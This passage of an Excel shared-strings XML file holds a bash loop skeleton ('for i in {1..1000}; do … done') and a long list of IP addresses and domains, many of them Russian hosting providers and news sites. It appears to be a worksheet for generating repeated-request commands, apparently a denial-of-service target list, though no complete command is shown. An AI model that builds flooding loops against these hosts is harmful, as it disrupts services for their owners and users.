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Вад\Desktop\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{A88AD466-F5EB-4B57-BB88-6905B558AADF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</sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">Sheet1!$A$2:$C$2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62" i="1" l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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1122" uniqueCount="757">
  <si>
    <t xml:space="preserve">for i in {1..1000}; do </t>
  </si>
  <si>
    <t>done</t>
  </si>
  <si>
    <t>62.122.170.171</t>
  </si>
  <si>
    <t>64.190.63.111</t>
  </si>
  <si>
    <t>91.195.240.126</t>
  </si>
  <si>
    <t>185.129.100.112</t>
  </si>
  <si>
    <t>109.70.26.37</t>
  </si>
  <si>
    <t>nic.ru</t>
  </si>
  <si>
    <t>15.197.142.173</t>
  </si>
  <si>
    <t>reg.ru</t>
  </si>
  <si>
    <t>52.50.65.32</t>
  </si>
  <si>
    <t>amazonaws.com</t>
  </si>
  <si>
    <t>beget.com</t>
  </si>
  <si>
    <t>194.58.112.174</t>
  </si>
  <si>
    <t>185.215.4.10</t>
  </si>
  <si>
    <t>89.111.167.3</t>
  </si>
  <si>
    <t>87.236.16.206</t>
  </si>
  <si>
    <t>31.31.205.163</t>
  </si>
  <si>
    <t>13.248.216.40</t>
  </si>
  <si>
    <t>35.186.238.101</t>
  </si>
  <si>
    <t>75.2.111.214</t>
  </si>
  <si>
    <t>serverel.net</t>
  </si>
  <si>
    <t>34.102.136.180</t>
  </si>
  <si>
    <t>googleusercontent.com</t>
  </si>
  <si>
    <t>awsglobalaccelerator.com</t>
  </si>
  <si>
    <t>72.52.179.175</t>
  </si>
  <si>
    <t>timeweb.ru</t>
  </si>
  <si>
    <t>ddos-guard.net</t>
  </si>
  <si>
    <t>masterhost.ru</t>
  </si>
  <si>
    <t>r01.ru</t>
  </si>
  <si>
    <t>your-server.de</t>
  </si>
  <si>
    <t>178.210.92.7</t>
  </si>
  <si>
    <t>ihc.ru</t>
  </si>
  <si>
    <t>regruhosting.ru</t>
  </si>
  <si>
    <t>rfn.ru</t>
  </si>
  <si>
    <t>regrucolo.ru</t>
  </si>
  <si>
    <t>80.247.32.209</t>
  </si>
  <si>
    <t>80.247.32.206</t>
  </si>
  <si>
    <t>parklogic.com</t>
  </si>
  <si>
    <t>64.190.63.136</t>
  </si>
  <si>
    <t>192.64.119.130</t>
  </si>
  <si>
    <t>162.255.119.192</t>
  </si>
  <si>
    <t>141.8.226.59</t>
  </si>
  <si>
    <t>52.128.23.153</t>
  </si>
  <si>
    <t>77.88.21.249</t>
  </si>
  <si>
    <t>186.2.170.100</t>
  </si>
  <si>
    <t>185.178.208.177</t>
  </si>
  <si>
    <t>185.129.100.200</t>
  </si>
  <si>
    <t>104.152.168.44</t>
  </si>
  <si>
    <t>hostwhitelabel.com</t>
  </si>
  <si>
    <t>yandex.net</t>
  </si>
  <si>
    <t>18.119.154.66</t>
  </si>
  <si>
    <t>217.160.231.108</t>
  </si>
  <si>
    <t>clienthosting.eu</t>
  </si>
  <si>
    <t>212.12.76.9</t>
  </si>
  <si>
    <t>ptvr.ru</t>
  </si>
  <si>
    <t>185.148.38.70</t>
  </si>
  <si>
    <t>rx.ru</t>
  </si>
  <si>
    <t>185.4.66.100</t>
  </si>
  <si>
    <t>37.130.197.1</t>
  </si>
  <si>
    <t>zilore.net</t>
  </si>
  <si>
    <t>37.130.196.1</t>
  </si>
  <si>
    <t>31.31.196.245</t>
  </si>
  <si>
    <t>5.178.80.46</t>
  </si>
  <si>
    <t>otr-online.ru</t>
  </si>
  <si>
    <t>5.178.80.44</t>
  </si>
  <si>
    <t>193.107.238.105</t>
  </si>
  <si>
    <t>netangels.ru</t>
  </si>
  <si>
    <t>193.107.236.161</t>
  </si>
  <si>
    <t>193.107.236.3</t>
  </si>
  <si>
    <t>188.226.17.6</t>
  </si>
  <si>
    <t>planeta.tc</t>
  </si>
  <si>
    <t>185.93.109.4</t>
  </si>
  <si>
    <t>185.71.67.248</t>
  </si>
  <si>
    <t>185.41.161.253</t>
  </si>
  <si>
    <t>178.248.234.146</t>
  </si>
  <si>
    <t>95.216.70.159</t>
  </si>
  <si>
    <t>blitz.plus</t>
  </si>
  <si>
    <t>91.201.54.56</t>
  </si>
  <si>
    <t>uralpolit.ru</t>
  </si>
  <si>
    <t>91.201.54.2</t>
  </si>
  <si>
    <t>91.201.52.2</t>
  </si>
  <si>
    <t>80.93.176.26</t>
  </si>
  <si>
    <t>h7.modhost.pro</t>
  </si>
  <si>
    <t>77.222.61.195</t>
  </si>
  <si>
    <t>vh224.sweb.ru</t>
  </si>
  <si>
    <t>31.31.198.199</t>
  </si>
  <si>
    <t>213.87.75.167</t>
  </si>
  <si>
    <t>mts.ru</t>
  </si>
  <si>
    <t>195.211.103.223</t>
  </si>
  <si>
    <t>televidoc.ru</t>
  </si>
  <si>
    <t>194.150.215.251</t>
  </si>
  <si>
    <t>galaxydata.ru</t>
  </si>
  <si>
    <t>193.176.76.153</t>
  </si>
  <si>
    <t>185.169.155.14</t>
  </si>
  <si>
    <t>130.193.62.133</t>
  </si>
  <si>
    <t>91.203.80.15</t>
  </si>
  <si>
    <t>web.tmpk.net</t>
  </si>
  <si>
    <t>91.189.114.17</t>
  </si>
  <si>
    <t>217.182.226.187</t>
  </si>
  <si>
    <t>hostiman.com</t>
  </si>
  <si>
    <t>213.159.211.2</t>
  </si>
  <si>
    <t>domainseller.ru</t>
  </si>
  <si>
    <t>210.54.38.201</t>
  </si>
  <si>
    <t>202.108.119.193</t>
  </si>
  <si>
    <t>198.55.101.21</t>
  </si>
  <si>
    <t>webmagic.com</t>
  </si>
  <si>
    <t>195.42.186.46</t>
  </si>
  <si>
    <t>uw.ru</t>
  </si>
  <si>
    <t>195.24.68.5</t>
  </si>
  <si>
    <t>194.87.247.7</t>
  </si>
  <si>
    <t>telekom.ru</t>
  </si>
  <si>
    <t>194.67.106.57</t>
  </si>
  <si>
    <t>194.67.86.61</t>
  </si>
  <si>
    <t>194.67.71.66</t>
  </si>
  <si>
    <t>194.58.112.167</t>
  </si>
  <si>
    <t>194.58.112.165</t>
  </si>
  <si>
    <t>192.185.46.43</t>
  </si>
  <si>
    <t>infoanetech.com</t>
  </si>
  <si>
    <t>185.189.12.114</t>
  </si>
  <si>
    <t>firstbyte.club</t>
  </si>
  <si>
    <t>185.133.42.193</t>
  </si>
  <si>
    <t>beta-glucan.ru</t>
  </si>
  <si>
    <t>185.72.146.142</t>
  </si>
  <si>
    <t>fullspace.ru</t>
  </si>
  <si>
    <t>185.42.12.130</t>
  </si>
  <si>
    <t>multihost.cloud</t>
  </si>
  <si>
    <t>185.22.152.65</t>
  </si>
  <si>
    <t>173.245.59.136</t>
  </si>
  <si>
    <t>cloudflare.com</t>
  </si>
  <si>
    <t>172.67.69.121</t>
  </si>
  <si>
    <t>149.154.71.110</t>
  </si>
  <si>
    <t>nsws.ru</t>
  </si>
  <si>
    <t>141.8.195.125</t>
  </si>
  <si>
    <t>from.sh</t>
  </si>
  <si>
    <t>141.8.192.93</t>
  </si>
  <si>
    <t>134.0.116.160</t>
  </si>
  <si>
    <t>128.14.151.195</t>
  </si>
  <si>
    <t>109.234.153.11</t>
  </si>
  <si>
    <t>104.26.5.80</t>
  </si>
  <si>
    <t>104.26.4.80</t>
  </si>
  <si>
    <t>104.21.77.232</t>
  </si>
  <si>
    <t>104.21.44.27</t>
  </si>
  <si>
    <t>104.21.24.184</t>
  </si>
  <si>
    <t>104.21.10.40</t>
  </si>
  <si>
    <t>95.213.164.227</t>
  </si>
  <si>
    <t>methodlab.ru</t>
  </si>
  <si>
    <t>95.183.8.25</t>
  </si>
  <si>
    <t>91.240.87.136</t>
  </si>
  <si>
    <t>niws.ru</t>
  </si>
  <si>
    <t>91.201.42.98</t>
  </si>
  <si>
    <t>dotnames.ru</t>
  </si>
  <si>
    <t>91.106.207.15</t>
  </si>
  <si>
    <t>91.103.252.108</t>
  </si>
  <si>
    <t>vhoste.ru</t>
  </si>
  <si>
    <t>89.253.223.64</t>
  </si>
  <si>
    <t>tanais.ru</t>
  </si>
  <si>
    <t>87.236.16.239</t>
  </si>
  <si>
    <t>87.236.16.62</t>
  </si>
  <si>
    <t>85.10.192.26</t>
  </si>
  <si>
    <t>81.177.22.153</t>
  </si>
  <si>
    <t>metallibrary.ru</t>
  </si>
  <si>
    <t>78.108.82.37</t>
  </si>
  <si>
    <t>co.uk</t>
  </si>
  <si>
    <t>62.181.46.38</t>
  </si>
  <si>
    <t>misc.qrz.ru</t>
  </si>
  <si>
    <t>62.141.58.43</t>
  </si>
  <si>
    <t>news.de</t>
  </si>
  <si>
    <t>54.201.83.202</t>
  </si>
  <si>
    <t>54.171.226.57</t>
  </si>
  <si>
    <t>46.183.163.233</t>
  </si>
  <si>
    <t>45.130.41.13</t>
  </si>
  <si>
    <t>45.88.202.115</t>
  </si>
  <si>
    <t>45.10.55.152</t>
  </si>
  <si>
    <t>34.149.42.100</t>
  </si>
  <si>
    <t>31.31.198.249</t>
  </si>
  <si>
    <t>5.187.3.119</t>
  </si>
  <si>
    <t>fornex.org</t>
  </si>
  <si>
    <t>5.101.159.26</t>
  </si>
  <si>
    <t>5.101.152.218</t>
  </si>
  <si>
    <t>195.20.49.165</t>
  </si>
  <si>
    <t>192.64.147.227</t>
  </si>
  <si>
    <t>voodoo.com</t>
  </si>
  <si>
    <t>170.33.9.230</t>
  </si>
  <si>
    <t>132.148.47.254</t>
  </si>
  <si>
    <t>isecureserver.net</t>
  </si>
  <si>
    <t>92.53.96.217</t>
  </si>
  <si>
    <t>89.188.115.50</t>
  </si>
  <si>
    <t>2sm.ru</t>
  </si>
  <si>
    <t>87.236.16.135</t>
  </si>
  <si>
    <t>81.19.82.101</t>
  </si>
  <si>
    <t>rambler.ru</t>
  </si>
  <si>
    <t>81.19.82.6</t>
  </si>
  <si>
    <t>81.19.70.4</t>
  </si>
  <si>
    <t>44.230.85.241</t>
  </si>
  <si>
    <t>18.117.34.193</t>
  </si>
  <si>
    <t>193.124.18.105</t>
  </si>
  <si>
    <t>regnim.ru</t>
  </si>
  <si>
    <t>178.248.237.127</t>
  </si>
  <si>
    <t>162.255.119.225</t>
  </si>
  <si>
    <t>104.21.21.140</t>
  </si>
  <si>
    <t>104.21.16.190</t>
  </si>
  <si>
    <t>95.216.28.23</t>
  </si>
  <si>
    <t>hostia.name</t>
  </si>
  <si>
    <t>94.228.123.231</t>
  </si>
  <si>
    <t>tmweb.ru</t>
  </si>
  <si>
    <t>92.62.112.153</t>
  </si>
  <si>
    <t>87.230.36.74</t>
  </si>
  <si>
    <t>psmanaged.com</t>
  </si>
  <si>
    <t>85.233.160.22</t>
  </si>
  <si>
    <t>66.81.199.56</t>
  </si>
  <si>
    <t>62.76.26.118</t>
  </si>
  <si>
    <t>regnum.su</t>
  </si>
  <si>
    <t>51.68.205.22</t>
  </si>
  <si>
    <t>ip-51-68-205.eu</t>
  </si>
  <si>
    <t>37.140.192.76</t>
  </si>
  <si>
    <t>194.67.71.107</t>
  </si>
  <si>
    <t>176.31.179.191</t>
  </si>
  <si>
    <t>172.64.33.112</t>
  </si>
  <si>
    <t>172.64.32.145</t>
  </si>
  <si>
    <t>148.251.70.134</t>
  </si>
  <si>
    <t>107.178.246.46</t>
  </si>
  <si>
    <t>94.228.240.121</t>
  </si>
  <si>
    <t>rosbalt.ru</t>
  </si>
  <si>
    <t>92.53.96.17</t>
  </si>
  <si>
    <t>37.143.11.11</t>
  </si>
  <si>
    <t>207.180.207.179</t>
  </si>
  <si>
    <t>contaboserver.net</t>
  </si>
  <si>
    <t>207.148.248.143</t>
  </si>
  <si>
    <t>195.20.55.247</t>
  </si>
  <si>
    <t>195.20.55.181</t>
  </si>
  <si>
    <t>195.20.50.21</t>
  </si>
  <si>
    <t>185.178.208.45</t>
  </si>
  <si>
    <t>173.249.63.101</t>
  </si>
  <si>
    <t>104.21.60.110</t>
  </si>
  <si>
    <t>104.21.46.56</t>
  </si>
  <si>
    <t>104.21.27.147</t>
  </si>
  <si>
    <t>217.69.139.180</t>
  </si>
  <si>
    <t>mail.ru</t>
  </si>
  <si>
    <t>188.241.116.117</t>
  </si>
  <si>
    <t>cloudns.net</t>
  </si>
  <si>
    <t>186.2.163.112</t>
  </si>
  <si>
    <t>108.59.1.205</t>
  </si>
  <si>
    <t>89.188.109.70</t>
  </si>
  <si>
    <t>cnt.ru</t>
  </si>
  <si>
    <t>85.159.233.17</t>
  </si>
  <si>
    <t>46.165.223.182</t>
  </si>
  <si>
    <t>195.161.62.100</t>
  </si>
  <si>
    <t>188.225.40.162</t>
  </si>
  <si>
    <t>185.32.57.184</t>
  </si>
  <si>
    <t>176.99.13.12</t>
  </si>
  <si>
    <t>176.99.13.11</t>
  </si>
  <si>
    <t>152.32.128.152</t>
  </si>
  <si>
    <t>144.76.167.14</t>
  </si>
  <si>
    <t>h0sting.net</t>
  </si>
  <si>
    <t>94.251.82.138</t>
  </si>
  <si>
    <t>nerz.ru</t>
  </si>
  <si>
    <t>91.226.31.57</t>
  </si>
  <si>
    <t>91.195.240.135</t>
  </si>
  <si>
    <t>91.189.114.24</t>
  </si>
  <si>
    <t>90.189.182.182</t>
  </si>
  <si>
    <t>snt.ru</t>
  </si>
  <si>
    <t>90.156.201.109</t>
  </si>
  <si>
    <t>31.148.96.132</t>
  </si>
  <si>
    <t>217.70.184.55</t>
  </si>
  <si>
    <t>gandi.net</t>
  </si>
  <si>
    <t>213.239.205.43</t>
  </si>
  <si>
    <t>CR0076</t>
  </si>
  <si>
    <t>199.59.243.200</t>
  </si>
  <si>
    <t>195.20.49.142</t>
  </si>
  <si>
    <t>195.20.49.125</t>
  </si>
  <si>
    <t>194.67.71.174</t>
  </si>
  <si>
    <t>194.67.71.68</t>
  </si>
  <si>
    <t>188.225.34.84</t>
  </si>
  <si>
    <t>173.255.194.134</t>
  </si>
  <si>
    <t>linode.com</t>
  </si>
  <si>
    <t>141.8.195.33</t>
  </si>
  <si>
    <t>99.83.248.67</t>
  </si>
  <si>
    <t>95.173.136.161</t>
  </si>
  <si>
    <t>95.173.136.82</t>
  </si>
  <si>
    <t>95.173.136.80</t>
  </si>
  <si>
    <t>95.173.136.79</t>
  </si>
  <si>
    <t>95.173.136.77</t>
  </si>
  <si>
    <t>95.173.136.72</t>
  </si>
  <si>
    <t>95.173.136.70</t>
  </si>
  <si>
    <t>92.51.149.198</t>
  </si>
  <si>
    <t>LVPS92-51-149-1</t>
  </si>
  <si>
    <t>91.236.136.120</t>
  </si>
  <si>
    <t>webhost1.ru</t>
  </si>
  <si>
    <t>91.194.2.84</t>
  </si>
  <si>
    <t>81.177.141.71</t>
  </si>
  <si>
    <t>jino.ru</t>
  </si>
  <si>
    <t>81.177.140.212</t>
  </si>
  <si>
    <t>80.87.192.95</t>
  </si>
  <si>
    <t>samodelkino.info</t>
  </si>
  <si>
    <t>62.233.121.5</t>
  </si>
  <si>
    <t>easyspace.com</t>
  </si>
  <si>
    <t>45.156.25.244</t>
  </si>
  <si>
    <t>18.116.152.12</t>
  </si>
  <si>
    <t>5.188.28.172</t>
  </si>
  <si>
    <t>fastvps-server.com</t>
  </si>
  <si>
    <t>5.101.152.189</t>
  </si>
  <si>
    <t>3.64.163.50</t>
  </si>
  <si>
    <t>95.84.178.79</t>
  </si>
  <si>
    <t>rt.ru</t>
  </si>
  <si>
    <t>94.250.250.113</t>
  </si>
  <si>
    <t>miklbel910.ru</t>
  </si>
  <si>
    <t>93.158.134.8</t>
  </si>
  <si>
    <t>92.53.96.210</t>
  </si>
  <si>
    <t>91.189.114.16</t>
  </si>
  <si>
    <t>91.122.53.157</t>
  </si>
  <si>
    <t>avangarddsl.ru</t>
  </si>
  <si>
    <t>89.108.104.59</t>
  </si>
  <si>
    <t>rma.ru</t>
  </si>
  <si>
    <t>88.212.196.82</t>
  </si>
  <si>
    <t>rax.ru</t>
  </si>
  <si>
    <t>87.236.16.14</t>
  </si>
  <si>
    <t>217.112.44.96</t>
  </si>
  <si>
    <t>valuehost.com</t>
  </si>
  <si>
    <t>217.20.147.1</t>
  </si>
  <si>
    <t>odnoklassniki.ru</t>
  </si>
  <si>
    <t>213.189.211.209</t>
  </si>
  <si>
    <t>rusonyx.ru</t>
  </si>
  <si>
    <t>213.189.197.23</t>
  </si>
  <si>
    <t>zenon.net</t>
  </si>
  <si>
    <t>213.172.99.99</t>
  </si>
  <si>
    <t>mk.de</t>
  </si>
  <si>
    <t>212.19.26.38</t>
  </si>
  <si>
    <t>nk.ru</t>
  </si>
  <si>
    <t>195.208.1.107</t>
  </si>
  <si>
    <t>195.24.68.25</t>
  </si>
  <si>
    <t>195.24.68.18</t>
  </si>
  <si>
    <t>195.24.65.30</t>
  </si>
  <si>
    <t>194.50.10.27</t>
  </si>
  <si>
    <t>mkm.ru</t>
  </si>
  <si>
    <t>193.169.122.152</t>
  </si>
  <si>
    <t>static.so-com.ru</t>
  </si>
  <si>
    <t>193.124.201.249</t>
  </si>
  <si>
    <t>193.106.248.75</t>
  </si>
  <si>
    <t>hostenko.com</t>
  </si>
  <si>
    <t>193.16.209.180</t>
  </si>
  <si>
    <t>190.115.31.6</t>
  </si>
  <si>
    <t>188.226.187.93</t>
  </si>
  <si>
    <t>188.120.226.1</t>
  </si>
  <si>
    <t>bst.ru</t>
  </si>
  <si>
    <t>188.72.205.231</t>
  </si>
  <si>
    <t>fozzy.com</t>
  </si>
  <si>
    <t>188.65.208.80</t>
  </si>
  <si>
    <t>knopp.ru</t>
  </si>
  <si>
    <t>188.65.129.150</t>
  </si>
  <si>
    <t>mk.ru</t>
  </si>
  <si>
    <t>185.221.152.200</t>
  </si>
  <si>
    <t>pradmin.ru</t>
  </si>
  <si>
    <t>185.159.65.114</t>
  </si>
  <si>
    <t>185.156.178.4</t>
  </si>
  <si>
    <t>vpsville.ru</t>
  </si>
  <si>
    <t>185.125.56.223</t>
  </si>
  <si>
    <t>185.105.226.14</t>
  </si>
  <si>
    <t>pdd-mail.ru</t>
  </si>
  <si>
    <t>185.3.143.82</t>
  </si>
  <si>
    <t>185.3.143.81</t>
  </si>
  <si>
    <t>185.3.143.72</t>
  </si>
  <si>
    <t>185.3.143.71</t>
  </si>
  <si>
    <t>185.3.143.66</t>
  </si>
  <si>
    <t>178.248.236.176</t>
  </si>
  <si>
    <t>149.202.67.152</t>
  </si>
  <si>
    <t>ip-149-202-67.eu</t>
  </si>
  <si>
    <t>149.126.100.248</t>
  </si>
  <si>
    <t>149.126.100.246</t>
  </si>
  <si>
    <t>129.226.75.253</t>
  </si>
  <si>
    <t>104.21.66.233</t>
  </si>
  <si>
    <t>104.21.60.194</t>
  </si>
  <si>
    <t>104.21.7.239</t>
  </si>
  <si>
    <t>95.214.58.132</t>
  </si>
  <si>
    <t>93.171.200.129</t>
  </si>
  <si>
    <t>mirahub.com</t>
  </si>
  <si>
    <t>92.245.4.219</t>
  </si>
  <si>
    <t>condornet.sk</t>
  </si>
  <si>
    <t>92.242.37.195</t>
  </si>
  <si>
    <t>BACKUP</t>
  </si>
  <si>
    <t>92.242.37.194</t>
  </si>
  <si>
    <t>92.242.36.165</t>
  </si>
  <si>
    <t>92.53.118.39</t>
  </si>
  <si>
    <t>91.230.208.133</t>
  </si>
  <si>
    <t>mtw.ru</t>
  </si>
  <si>
    <t>91.189.114.30</t>
  </si>
  <si>
    <t>89.188.96.102</t>
  </si>
  <si>
    <t>citytelecom.ru</t>
  </si>
  <si>
    <t>89.111.181.21</t>
  </si>
  <si>
    <t>hc.ru</t>
  </si>
  <si>
    <t>85.12.197.110</t>
  </si>
  <si>
    <t>82.202.190.254</t>
  </si>
  <si>
    <t>81.177.139.160</t>
  </si>
  <si>
    <t>78.110.50.121</t>
  </si>
  <si>
    <t>ht-systems.ru</t>
  </si>
  <si>
    <t>78.108.80.142</t>
  </si>
  <si>
    <t>majordomo.ru</t>
  </si>
  <si>
    <t>78.108.80.76</t>
  </si>
  <si>
    <t>77.246.156.216</t>
  </si>
  <si>
    <t>trias-host.ru</t>
  </si>
  <si>
    <t>51.250.4.19</t>
  </si>
  <si>
    <t>51.136.14.31</t>
  </si>
  <si>
    <t>47.110.73.28</t>
  </si>
  <si>
    <t>46.46.141.141</t>
  </si>
  <si>
    <t>46.38.50.30</t>
  </si>
  <si>
    <t>tel.ru</t>
  </si>
  <si>
    <t>45.155.60.8</t>
  </si>
  <si>
    <t>37.228.88.134</t>
  </si>
  <si>
    <t>37.140.192.245</t>
  </si>
  <si>
    <t>31.177.76.70</t>
  </si>
  <si>
    <t>31.40.100.35</t>
  </si>
  <si>
    <t>dmdhost.ru</t>
  </si>
  <si>
    <t>31.31.196.188</t>
  </si>
  <si>
    <t>31.28.24.117</t>
  </si>
  <si>
    <t>hoster.ru</t>
  </si>
  <si>
    <t>5.188.131.10</t>
  </si>
  <si>
    <t>5.101.153.11</t>
  </si>
  <si>
    <t>5.45.121.35</t>
  </si>
  <si>
    <t>5.43.228.60</t>
  </si>
  <si>
    <t>host-telecom.com</t>
  </si>
  <si>
    <t>185.53.178.54</t>
  </si>
  <si>
    <t>185.53.178.53</t>
  </si>
  <si>
    <t>138.201.79.102</t>
  </si>
  <si>
    <t>109.235.74.225</t>
  </si>
  <si>
    <t>yoursrs.com</t>
  </si>
  <si>
    <t>104.21.77.47</t>
  </si>
  <si>
    <t>104.21.34.243</t>
  </si>
  <si>
    <t>95.173.136.174</t>
  </si>
  <si>
    <t>95.173.136.171</t>
  </si>
  <si>
    <t>95.173.136.168</t>
  </si>
  <si>
    <t>95.173.136.162</t>
  </si>
  <si>
    <t>94.136.40.51</t>
  </si>
  <si>
    <t>77.87.208.21</t>
  </si>
  <si>
    <t>domenus.ru</t>
  </si>
  <si>
    <t>45.130.41.7</t>
  </si>
  <si>
    <t>216.127.189.105</t>
  </si>
  <si>
    <t>multacom.com</t>
  </si>
  <si>
    <t>213.189.196.123</t>
  </si>
  <si>
    <t>195.208.1.105</t>
  </si>
  <si>
    <t>195.20.53.222</t>
  </si>
  <si>
    <t>194.28.239.164</t>
  </si>
  <si>
    <t>tass.ru</t>
  </si>
  <si>
    <t>194.28.239.160</t>
  </si>
  <si>
    <t>194.28.239.151</t>
  </si>
  <si>
    <t>194.28.239.90</t>
  </si>
  <si>
    <t>194.28.239.47</t>
  </si>
  <si>
    <t>194.28.239.46</t>
  </si>
  <si>
    <t>194.28.239.45</t>
  </si>
  <si>
    <t>194.28.239.44</t>
  </si>
  <si>
    <t>194.28.239.43</t>
  </si>
  <si>
    <t>194.28.239.42</t>
  </si>
  <si>
    <t>194.28.239.41</t>
  </si>
  <si>
    <t>194.28.239.23</t>
  </si>
  <si>
    <t>194.28.239.21</t>
  </si>
  <si>
    <t>194.28.236.188</t>
  </si>
  <si>
    <t>194.28.236.105</t>
  </si>
  <si>
    <t>tass-online.org</t>
  </si>
  <si>
    <t>194.28.236.55</t>
  </si>
  <si>
    <t>194.28.236.39</t>
  </si>
  <si>
    <t>192.184.63.226</t>
  </si>
  <si>
    <t>psychz.net</t>
  </si>
  <si>
    <t>185.230.63.107</t>
  </si>
  <si>
    <t>wixsite.com</t>
  </si>
  <si>
    <t>185.215.4.16</t>
  </si>
  <si>
    <t>185.165.123.206</t>
  </si>
  <si>
    <t>185.148.39.50</t>
  </si>
  <si>
    <t>185.98.86.13</t>
  </si>
  <si>
    <t>185.71.67.4</t>
  </si>
  <si>
    <t>185.53.177.31</t>
  </si>
  <si>
    <t>178.210.85.72</t>
  </si>
  <si>
    <t>nichost.ru</t>
  </si>
  <si>
    <t>178.63.50.103</t>
  </si>
  <si>
    <t>ru-tld.ru</t>
  </si>
  <si>
    <t>176.9.100.231</t>
  </si>
  <si>
    <t>165.160.13.20</t>
  </si>
  <si>
    <t>152.67.60.153</t>
  </si>
  <si>
    <t>104.21.79.254</t>
  </si>
  <si>
    <t>92.53.96.206</t>
  </si>
  <si>
    <t>91.226.31.83</t>
  </si>
  <si>
    <t>91.216.130.24</t>
  </si>
  <si>
    <t>91.216.130.23</t>
  </si>
  <si>
    <t>91.216.130.22</t>
  </si>
  <si>
    <t>91.216.130.21</t>
  </si>
  <si>
    <t>82.202.190.240</t>
  </si>
  <si>
    <t>82.202.190.76</t>
  </si>
  <si>
    <t>82.202.190.72</t>
  </si>
  <si>
    <t>80.253.18.24</t>
  </si>
  <si>
    <t>78.110.50.140</t>
  </si>
  <si>
    <t>74.208.236.78</t>
  </si>
  <si>
    <t>ui-r.com</t>
  </si>
  <si>
    <t>54.194.41.141</t>
  </si>
  <si>
    <t>46.36.218.27</t>
  </si>
  <si>
    <t>37.140.192.239</t>
  </si>
  <si>
    <t>37.140.192.212</t>
  </si>
  <si>
    <t>31.31.196.239</t>
  </si>
  <si>
    <t>217.29.53.65</t>
  </si>
  <si>
    <t>212.224.112.42</t>
  </si>
  <si>
    <t>195.208.1.102</t>
  </si>
  <si>
    <t>195.20.53.162</t>
  </si>
  <si>
    <t>195.20.50.194</t>
  </si>
  <si>
    <t>194.67.71.58</t>
  </si>
  <si>
    <t>185.215.4.12</t>
  </si>
  <si>
    <t>185.163.158.25</t>
  </si>
  <si>
    <t>bi.zone</t>
  </si>
  <si>
    <t>185.22.235.94</t>
  </si>
  <si>
    <t>181.214.142.230</t>
  </si>
  <si>
    <t>ruachwebs.net</t>
  </si>
  <si>
    <t>178.248.235.122</t>
  </si>
  <si>
    <t>178.159.254.71</t>
  </si>
  <si>
    <t>178.62.23.114</t>
  </si>
  <si>
    <t>176.31.176.75</t>
  </si>
  <si>
    <t>active.domains</t>
  </si>
  <si>
    <t>176.9.231.104</t>
  </si>
  <si>
    <t>timmeserver.de</t>
  </si>
  <si>
    <t>166.88.62.202</t>
  </si>
  <si>
    <t>138.201.149.15</t>
  </si>
  <si>
    <t>devup.cc</t>
  </si>
  <si>
    <t>128.0.143.191</t>
  </si>
  <si>
    <t>104.21.80.55</t>
  </si>
  <si>
    <t>104.21.41.34</t>
  </si>
  <si>
    <t>104.21.28.17</t>
  </si>
  <si>
    <t>104.21.13.101</t>
  </si>
  <si>
    <t>104.21.6.104</t>
  </si>
  <si>
    <t>95.217.195.199</t>
  </si>
  <si>
    <t>wmrs.ru</t>
  </si>
  <si>
    <t>91.237.98.188</t>
  </si>
  <si>
    <t>makonix.com</t>
  </si>
  <si>
    <t>91.218.229.10</t>
  </si>
  <si>
    <t>91.217.9.43</t>
  </si>
  <si>
    <t>webhost1.net</t>
  </si>
  <si>
    <t>91.217.9.38</t>
  </si>
  <si>
    <t>91.201.52.247</t>
  </si>
  <si>
    <t>91.121.71.36</t>
  </si>
  <si>
    <t>ns351775.ip-91-121-71.eu</t>
  </si>
  <si>
    <t>90.156.201.12</t>
  </si>
  <si>
    <t>90.156.201.11</t>
  </si>
  <si>
    <t>88.99.94.73</t>
  </si>
  <si>
    <t>link-host.net</t>
  </si>
  <si>
    <t>87.236.16.214</t>
  </si>
  <si>
    <t>87.236.16.92</t>
  </si>
  <si>
    <t>87.236.16.19</t>
  </si>
  <si>
    <t>85.209.148.99</t>
  </si>
  <si>
    <t>hostfly.by</t>
  </si>
  <si>
    <t>85.92.118.220</t>
  </si>
  <si>
    <t>82.202.190.33</t>
  </si>
  <si>
    <t>81.19.92.83</t>
  </si>
  <si>
    <t>afisha.ru</t>
  </si>
  <si>
    <t>81.19.92.64</t>
  </si>
  <si>
    <t>81.19.83.9</t>
  </si>
  <si>
    <t>81.19.73.9</t>
  </si>
  <si>
    <t>81.19.73.8</t>
  </si>
  <si>
    <t>81.19.72.57</t>
  </si>
  <si>
    <t>lenta.ru</t>
  </si>
  <si>
    <t>80.87.192.133</t>
  </si>
  <si>
    <t>ava.ru</t>
  </si>
  <si>
    <t>46.105.127.143</t>
  </si>
  <si>
    <t>ns385442.ip-46-105-127.eu</t>
  </si>
  <si>
    <t>31.31.196.159</t>
  </si>
  <si>
    <t>5.101.153.235</t>
  </si>
  <si>
    <t>216.239.34.21</t>
  </si>
  <si>
    <t>any-in-2215.1e100.net</t>
  </si>
  <si>
    <t>209.17.116.8</t>
  </si>
  <si>
    <t>208.91.197.27</t>
  </si>
  <si>
    <t>198.58.110.249</t>
  </si>
  <si>
    <t>linodeusercontent.com</t>
  </si>
  <si>
    <t>195.201.21.239</t>
  </si>
  <si>
    <t>rtw.com</t>
  </si>
  <si>
    <t>192.64.119.254</t>
  </si>
  <si>
    <t>185.53.178.51</t>
  </si>
  <si>
    <t>185.48.90.65</t>
  </si>
  <si>
    <t>r4.com</t>
  </si>
  <si>
    <t>167.68.44.7</t>
  </si>
  <si>
    <t>flosuitelegal.com</t>
  </si>
  <si>
    <t>156.225.187.144</t>
  </si>
  <si>
    <t>129.226.12.194</t>
  </si>
  <si>
    <t>123.254.104.158</t>
  </si>
  <si>
    <t>laws.ms</t>
  </si>
  <si>
    <t>123.1.189.219</t>
  </si>
  <si>
    <t>S656188</t>
  </si>
  <si>
    <t>103.224.182.246</t>
  </si>
  <si>
    <t>above.com</t>
  </si>
  <si>
    <t>91.215.41.9</t>
  </si>
  <si>
    <t>82.208.44.87</t>
  </si>
  <si>
    <t>casablanca.cz</t>
  </si>
  <si>
    <t>78.141.240.5</t>
  </si>
  <si>
    <t>vultrusercontent.com</t>
  </si>
  <si>
    <t>75.126.104.229</t>
  </si>
  <si>
    <t>static.sl-reverse.com</t>
  </si>
  <si>
    <t>64.98.135.17</t>
  </si>
  <si>
    <t>46.231.207.73</t>
  </si>
  <si>
    <t>webkeeper.ch</t>
  </si>
  <si>
    <t>45.88.195.89</t>
  </si>
  <si>
    <t>DMIT.com</t>
  </si>
  <si>
